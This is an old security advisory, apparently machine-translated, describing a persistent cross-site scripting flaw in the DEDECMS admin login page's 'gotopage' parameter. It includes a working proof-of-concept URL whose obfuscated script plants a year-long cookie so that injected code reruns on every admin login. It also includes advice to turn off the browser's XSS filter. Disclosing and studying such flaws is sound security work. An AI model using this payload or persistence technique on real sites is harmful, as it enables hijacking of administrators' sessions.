DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

2011-10-17T00:00:00
ID MYHACK58:62201132076
Type myhack58
Reporter 佚名
Modified 2011-10-17T00:00:00

Description

Affected versions: DEDECMS full version

The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right <input type="hidden" name="gotopage" value="<? php if(! empty($gotopage)) echo $gotopage;?& gt;" /> Since DEDECMS global variable registration mechanism, the variable content may be COOKIE variables override,can be in the client persistent memory, eventually leading to aXSS ROOTKITS.

Vulnerability to harm: The administrator in the trigger DEDECMS anyXSSvulnerabilities(such as guestbookXSS), through the vulnerability permanently hijack cover gotopage variable, in DEDECMS background landing page to permanently embed any malicious code.

Validation: 1. Copy and paste the following URL to access the triggerXSSinstalledXSS ROOTKIT,note IE8/9, etc. will intercept the URL typeXSSvulnerability, the need to closeXSSfilter. http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String. fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

  1. Close the browser, regardless of how access to any of the following URL will trigger ourXSS. <http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda> <http://v57.demo.dedecms.com/dede/login.php>